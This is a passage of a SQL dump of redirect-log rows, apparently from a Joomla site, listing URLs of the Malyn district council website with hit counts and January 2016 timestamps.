00:00:00',301),(24376,'http://www.malyn-rayrada.org.ua/index.php?catid=57&id=1275:2014-04-10-13-24-47&Itemid=98&lang=en&option=com_content&view=article','','','',1,0,'2016-01-06 14:31:48','0000-00-00 00:00:00',301),(24377,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1263:2014-03-31-14-00-08&Itemid=17&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-06 14:36:00','0000-00-00 00:00:00',301),(24378,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1254:-1-50&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-06 14:37:29','0000-00-00 00:00:00',301),(24379,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1271:2014-04-09-05-14-20&Itemid=17&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-06 14:37:38','0000-00-00 00:00:00',301),(24380,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?catid=58:--30042014-&id=1306:2014-04-30-09-40-02&lang=uk','','','',1,0,'2016-01-06 14:38:03','0000-00-00 00:00:00',301),(24381,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1274:----------------l--r&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-06 14:41:43','0000-00-00 00:00:00',301),(24382,'http://www.malyn-rayrada.org.ua/index.php?catid=57:--15042014-&id=1269:-3110&Itemid=98&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-06 14:54:44','0000-00-00 00:00:00',301),(24383,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1256:2014-03-27-17-22-43&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-01-06 14:55:03','0000-00-00 00:00:00',301),(24385,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=179:2010-11-30-09-08-30&catid=11&lang=uk','','','',5,0,'2016-01-06 19:04:45','0000-00-00 00:00:00',301),(24386,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04?page=2','','','',16,0,'2016-01-07 00:13:24','0000-00-00 00:00:00',301),(24387,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=832:-9-2012-&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-07 02:37:50','0000-00-00 00:00:00',301),(24388,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=45&layout=blog&Itemid=84&lang=en&limitstart=5','','','',5,0,'2016-01-07 05:25:13','0000-00-00 00:00:00',301),(24389,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=552:2012-01-26-12-47-12&catid=39&Itemid=76&lang=uk','','','',2,0,'2016-01-07 06:04:39','0000-00-00 00:00:00',301),(24390,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=en&limitstart=20','','','',3,0,'2016-01-07 06:39:32','0000-00-00 00:00:00',301),(24391,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=324:2011-05-20-16-10-02&catid=33&Itemid=66&lang=uk','','','',2,0,'2016-01-07 07:30:55','0000-00-00 00:00:00',301),(24394,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1285:2014-04-17-16-55-05&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-07 07:49:32','0000-00-00 00:00:00',301),(24395,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1283:2014-04-15-16-30-00&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 07:51:50','0000-00-00 00:00:00',301),(24396,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1255:2014-03-27-06-02-11&Itemid=17&lang=en&option=com_content&view=article','','','',1,0,'2016-01-07 08:12:12','0000-00-00 00:00:00',301),(24397,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1254:-1-50&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 08:25:39','0000-00-00 00:00:00',301),(24398,'http://www.malyn-rayrada.org.ua/index.php?catid=57&id=1276:2014-04-10-13-26-15&Itemid=98&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-07 08:31:52','0000-00-00 00:00:00',301),(24399,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1286:2014-04-23-06-48-27&Itemid=17&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 09:33:26','0000-00-00 00:00:00',301),(24401,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1276:2014-04-10-13-26-15&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-07 09:34:45','0000-00-00 00:00:00',301),(24403,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1267:2014-04-03-21-52-50&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 09:36:15','0000-00-00 00:00:00',301),(24404,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1268:---------------l-r&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-07 09:36:57','0000-00-00 00:00:00',301),(24405,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1276:2014-04-10-13-26-15&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-07 09:37:40','0000-00-00 00:00:00',301),(24406,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/597-pro-hid-vikonannja-rajonnoi-cilovoi-programi_4?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 09:49:49','0000-00-00 00:00:00',301),(24407,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/600-pro-zatverdzhennja-rajonnoi-cilovoi-socialnoi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 09:49:51','0000-00-00 00:00:00',301),(24408,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/784-pro-vnesennja-zmin-do-programi-vidpochinku-ta_2','','','',5,0,'2016-01-07 09:50:36','0000-00-00 00:00:00',301),(24409,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/459-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_19','','','',3,0,'2016-01-07 09:51:33','0000-00-00 00:00:00',301),(24410,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/460-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_11?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 09:51:39','0000-00-00 00:00:00',301),(24411,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/258-pro-zatverdzhennja-rozmiru-vartosti-produktiv_2','','','',4,0,'2016-01-07 09:51:47','0000-00-00 00:00:00',301),(24412,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/929-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','','',5,0,'2016-01-07 09:54:28','0000-00-00 00:00:00',301),(24413,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/929-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-07 09:54:31','0000-00-00 00:00:00',301),(24414,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=965:2013-03-14-10-56-03&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 09:58:33','0000-00-00 00:00:00',301),(24415,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1277:-2014-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 10:04:23','0000-00-00 00:00:00',301),(24416,'http://malyn-rayrada.org.ua/index.php/1037-pishov-iz-zhittya-tsvik-s-m?tmpl=component&print=1&layout=default&page=','','','',13,0,'2016-01-07 10:19:19','0000-00-00 00:00:00',301),(24417,'http://malyn-rayrada.org.ua/index.php/1067-kp-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:19:23','0000-00-00 00:00:00',301),(24418,'http://malyn-rayrada.org.ua/index.php/1214-naperedodni-mistsevikh-viboriv-malinskij-mrv-usbu-v-zhitomirskij-oblasti-nagadue-telefon-doviri?tmpl=component&print=1&layout=default&page=','','','',13,0,'2016-01-07 10:21:40','0000-00-00 00:00:00',301),(24419,'http://malyn-rayrada.org.ua/index.php/1218-16-zhovtnya-2015-roku-vidbudetsya-spilnij-seminar-navchannya-dlya-platnikiv-podatkiv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:21:52','0000-00-00 00:00:00',301),(24420,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18?page=2','','','',12,0,'2016-01-07 10:22:45','0000-00-00 00:00:00',301),(24421,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18?page=3','','','',12,0,'2016-01-07 10:22:47','0000-00-00 00:00:00',301),(24422,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04?page=2','','','',5,0,'2016-01-07 10:23:06','0000-00-00 00:00:00',301),(24423,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1078-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-novovorob-jivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:26:14','0000-00-00 00:00:00',301),(24424,'http://malyn-rayrada.org.ua/index.php/259-vidznacheno-deputata-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:27:08','0000-00-00 00:00:00',301),(24425,'http://malyn-rayrada.org.ua/index.php/265-nadhodzhennja-dohodiv-do-bjudzhetu-zhitomirskoi','','','',5,0,'2016-01-07 10:27:10','0000-00-00 00:00:00',301),(24426,'http://malyn-rayrada.org.ua/index.php/454-vitaemo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:27:49','0000-00-00 00:00:00',301),(24427,'http://malyn-rayrada.org.ua/index.php/539-malinska-rajonna-rada-shhiro-vitae-vas-iz-dnem?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:28:02','0000-00-00 00:00:00',301),(24428,'http://malyn-rayrada.org.ua/index.php/652-do-vidoma-deputativ-rajonnoi-radi-z-utochnennjam','','','',3,0,'2016-01-07 10:29:38','0000-00-00 00:00:00',301),(24429,'http://malyn-rayrada.org.ua/index.php/717-pozachergovi-vibori-prezidenta-vidbudutsja-25?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:29:59','0000-00-00 00:00:00',301),(24430,'http://malyn-rayrada.org.ua/index.php/718-vidbulas-pozachergova-sesija-malinskoi-rajonnoi','','','',5,0,'2016-01-07 10:30:02','0000-00-00 00:00:00',301),(24431,'http://malyn-rayrada.org.ua/index.php/759-ogoloshennja_14?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:30:19','0000-00-00 00:00:00',301),(24432,'http://malyn-rayrada.org.ua/index.php/775-pro-sklikannja-30-sesii-rajonnoi-radi-6-sklikannja','','','',3,0,'2016-01-07 10:30:23','0000-00-00 00:00:00',301),(24433,'http://malyn-rayrada.org.ua/index.php/835-malinskij-rajonnij-centr-socialnih-sluzhb-dlja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:31:30','0000-00-00 00:00:00',301),(24434,'http://malyn-rayrada.org.ua/index.php/897-vitaemo-oleksiya-grigorovicha-iz-vpevnenoyu-peremogoyu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:31:39','0000-00-00 00:00:00',301),(24435,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1163-pro-peredachu-primishchennya-lyubovitskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-lyubovitskoji-silskoji-radi','','','',11,0,'2016-01-07 10:33:04','0000-00-00 00:00:00',301),(24436,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1164-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',11,0,'2016-01-07 10:33:06','0000-00-00 00:00:00',301),(24437,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1165-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',13,0,'2016-01-07 10:33:09','0000-00-00 00:00:00',301),(24438,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1166-pro-khid-vikonannya-rajonnoji-programi-sotsialnoji-pidtrimki-vnutrishno-peremishchenikh-osib-z-timchasovo-okupovanoji-teritoriji','','','',11,0,'2016-01-07 10:33:11','0000-00-00 00:00:00',301),(24439,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/406-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_16?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:33:49','0000-00-00 00:00:00',301),(24440,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/362-pro-zminu-nazvi-nedashkivskoi-zosh-i-iii-stupeniv','','','',3,0,'2016-01-07 10:34:15','0000-00-00 00:00:00',301),(24441,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/363-pro-vnesennja-zmin-do-programi-zajnjatosti?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:34:20','0000-00-00 00:00:00',301),(24442,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/376-pro-vnesennja-zmin-ta-dopovnen-do-rajonnoi_2','','','',3,0,'2016-01-07 10:34:28','0000-00-00 00:00:00',301),(24443,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/382-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_4?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:34:31','0000-00-00 00:00:00',301),(24444,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/394-pro-deputatskij-zapit-deputata-rajonnoi-radi','','','',5,0,'2016-01-07 10:34:35','0000-00-00 00:00:00',301),(24445,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/396-pro-pogodzhennja-priznachennja-na-posadu-direktora_2','','','',3,0,'2016-01-07 10:34:37','0000-00-00 00:00:00',301),(24446,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/400-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_5','','','',3,0,'2016-01-07 10:34:43','0000-00-00 00:00:00',301),(24447,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/749-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_19?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-07 10:34:56','0000-00-00 00:00:00',301),(24448,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/766-pro-pogodzhennja-priznachennja-na-posadu-direktora_4','','','',5,0,'2016-01-07 10:34:58','0000-00-00 00:00:00',301),(24449,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/767-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_6','','','',5,0,'2016-01-07 10:35:00','0000-00-00 00:00:00',301),(24450,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/190-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_4','','','',5,0,'2016-01-07 10:35:46','0000-00-00 00:00:00',301),(24451,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/191-pro-vnesennja-zmin-do-tipovogo-dogovoru-orendi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-07 10:35:53','0000-00-00 00:00:00',301),(24452,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/192-pro-vnesennja-zmin-ta-dopovnen-do-polozhennja-pro?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-07 10:36:04','0000-00-00 00:00:00',301),(24453,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1283:2014-04-15-16-30-00&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-07 10:49:33','0000-00-00 00:00:00',301),(24454,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=758:--15---&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-07 11:03:00','0000-00-00 00:00:00',301),(24455,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1259:1&Itemid=17&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 11:58:45','0000-00-00 00:00:00',301),(24456,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=605:-l-r-i-iii-&lang=en&option=com_content&view=article','','','',1,0,'2016-01-07 12:03:58','0000-00-00 00:00:00',301),(24457,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1277-pro-ugodu-mizh-zhitomirskoyu-oblasnoyu-radoyu-ta-malinskoyu-rajonnoyu-radoyu','','','',5,0,'2016-01-07 12:38:10','0000-00-00 00:00:00',301),(24458,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1285:2014-04-17-16-55-05&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 12:38:58','0000-00-00 00:00:00',301),(24459,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1183:2014-01-28-09-18-31&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 12:58:16','0000-00-00 00:00:00',301),(24460,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1282:-30-6-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 12:58:39','0000-00-00 00:00:00',301),(24461,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1282:-30-6-&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 13:16:47','0000-00-00 00:00:00',301),(24462,'http://www.malyn-rayrada.org.ua/index.php?catid=57&id=1275:2014-04-10-13-24-47&Itemid=98&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 14:21:24','0000-00-00 00:00:00',301),(24463,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=195:------------2010-&lang=ru&option=com_content&view=article','','','',4,0,'2016-01-07 14:31:56','0000-00-00 00:00:00',301),(24464,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1267:2014-04-03-21-52-50&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 14:32:32','0000-00-00 00:00:00',301),(24465,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1283:2014-04-15-16-30-00&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-07 14:32:50','0000-00-00 00:00:00',301),(24466,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1275:2014-04-10-13-24-47&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 14:33:22','0000-00-00 00:00:00',301),(24467,'http://www.malyn-rayrada.org.ua/index.php?id=13&Itemid=33&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-01-07 14:33:36','0000-00-00 00:00:00',301),(24468,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1254:-1-50&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 14:33:47','0000-00-00 00:00:00',301),(24469,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1270:2014-04-08-13-49-40&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 14:34:57','0000-00-00 00:00:00',301),(24470,'http://www.malyn-rayrada.org.ua/index.php?catid=57&id=1276:2014-04-10-13-26-15&Itemid=98&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 14:35:34','0000-00-00 00:00:00',301),(24471,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1266:2014-04-03-05-25-14&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-07 14:36:54','0000-00-00 00:00:00',301),(24472,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1285:2014-04-17-16-55-05&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 14:41:01','0000-00-00 00:00:00',301),(24473,'http://www.malyn-rayrada.org.ua/index.php?catid=57&id=1275:2014-04-10-13-24-47&Itemid=98&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 14:41:41','0000-00-00 00:00:00',301),(24474,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47:-21022013-&layout=blog&Itemid=86&lang=uk&limitstart=20','','','',1,0,'2016-01-07 14:56:05','0000-00-00 00:00:00',301),(24475,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1270:2014-04-08-13-49-40&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 15:10:16','0000-00-00 00:00:00',301),(24476,'http://www.malyn-rayrada.org.ua/index.php?catid=57:--15042014-&id=1275:2014-04-10-13-24-47&Itemid=98&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 15:11:29','0000-00-00 00:00:00',301),(24477,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1270:2014-04-08-13-49-40&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 15:11:57','0000-00-00 00:00:00',301),(24478,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1270:2014-04-08-13-49-40&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 15:12:33','0000-00-00 00:00:00',301),(24479,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1283:2014-04-15-16-30-00&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 15:13:00','0000-00-00 00:00:00',301),(24480,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1277:-2014-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-07 15:13:40','0000-00-00 00:00:00',301),(24481,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1282:-30-6-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-07 15:14:30','0000-00-00 00:00:00',301),(24482,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1278:2014-04-11-13-44-30&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 15:17:19','0000-00-00 00:00:00',301),(24483,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1046:-----------2013----&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 15:18:18','0000-00-00 00:00:00',301),(24484,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1283:2014-04-15-16-30-00&lang=ru&option=com_content&view=article','','','',3,0,'2016-01-07 15:19:56','0000-00-00 00:00:00',301),(24485,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=588:2012-02-27-13-48-51&Itemid=77&lang=en&option=com_content&view=article','','','',2,0,'2016-01-07 15:21:43','0000-00-00 00:00:00',301),(24486,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1269:----3110&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 15:26:40','0000-00-00 00:00:00',301),(24487,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=948:-2012-&Itemid=88&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 15:29:09','0000-00-00 00:00:00',301),(24488,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1268:---------------l-r&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 15:30:30','0000-00-00 00:00:00',301),(24489,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1269:----3110&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-07 15:33:11','0000-00-00 00:00:00',301),(24490,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1072:-24-6-&lang=en&option=com_content&view=article','','','',3,0,'2016-01-07 15:34:29','0000-00-00 00:00:00',301),(24491,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1277:-2014-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 15:38:15','0000-00-00 00:00:00',301),(24492,'http://malyn-rayrada.org.ua/index.php?Itemid=84&id=45:--14112012-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-01-07 15:42:30','0000-00-00 00:00:00',301),(24493,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1278-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-yaka-peredaetsya-v-orendu-gr-beginu-v-m','','','',4,0,'2016-01-07 17:09:14','0000-00-00 00:00:00',301),(24494,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=en&limitstart=5','','','',2,0,'2016-01-07 19:58:31','0000-00-00 00:00:00',301),(24495,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=45:--14112012-&layout=blog&Itemid=84&lang=en&limitstart=5','','','',1,0,'2016-01-07 20:31:57','0000-00-00 00:00:00',301),(24496,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1257:2014-03-29-18-03-31&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-07 21:50:38','0000-00-00 00:00:00',301),(24497,'http://www.malyn-rayrada.org.ua/index.php/820-blagodijna-organizacija-„likarnjana-kasa','','','',2,0,'2016-01-07 23:00:03','0000-00-00 00:00:00',301),(24498,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=uk','','','',2,0,'2016-01-07 23:31:35','0000-00-00 00:00:00',301),(24499,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:--------------------2013-2017-&catid=47:--21022013-&Itemid=86&lang=ru','','','',6,0,'2016-01-08 02:12:19','0000-00-00 00:00:00',301),(24500,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?catid=58&id=1306:2014-04-30-09-40-02&lang=ru','','','',1,0,'2016-01-08 04:20:21','0000-00-00 00:00:00',301),(24501,'http://malyn-rayrada.org.ua/index.php?Itemid=62&catid=31&id=275:---------------2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-08 04:59:14','0000-00-00 00:00:00',301),(24502,'http://www.malyn-rayrada.org.ua/index.php?catid=57:--15042014-&id=1269:-3110&Itemid=98&lang=en&option=com_content&view=article','','','',1,0,'2016-01-08 05:46:43','0000-00-00 00:00:00',301),(24503,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1279:2014-04-13-11-36-46&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-08 06:13:55','0000-00-00 00:00:00',301),(24504,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?catid=58:--30042014-&id=1293:-2014-&lang=uk','','','',4,0,'2016-01-08 06:14:43','0000-00-00 00:00:00',301),(24505,'http://www.malyn-rayrada.org.ua/index.php?catid=57:--15042014-&id=1277:-2014-&Itemid=98&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-08 06:16:26','0000-00-00 00:00:00',301),(24506,'http://malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=311:-v-&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-08 08:40:31','0000-00-00 00:00:00',301),(24507,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1048:2013-07-10-05-53-06&lang=ru&option=com_content&view=article','','','',3,0,'2016-01-08 13:07:08','0000-00-00 00:00:00',301),(24508,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=35&Itemid=69&lang=uk/','','','',2,0,'2016-01-08 13:52:43','0000-00-00 00:00:00',301),(24509,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=13&Itemid=33&lang=uk','','','',7,0,'2016-01-08 13:52:50','0000-00-00 00:00:00',301),(24510,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04?page=1','','','',3,0,'2016-01-08 14:48:51','0000-00-00 00:00:00',301),(24511,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu/2014-09-22-17-49-27','','','',7,0,'2016-01-08 14:50:36','0000-00-00 00:00:00',301),(24512,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1285:2014-04-17-16-55-05&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-08 20:22:32','0000-00-00 00:00:00',301),(24513,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1257:2014-03-29-18-03-31&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-08 20:40:58','0000-00-00 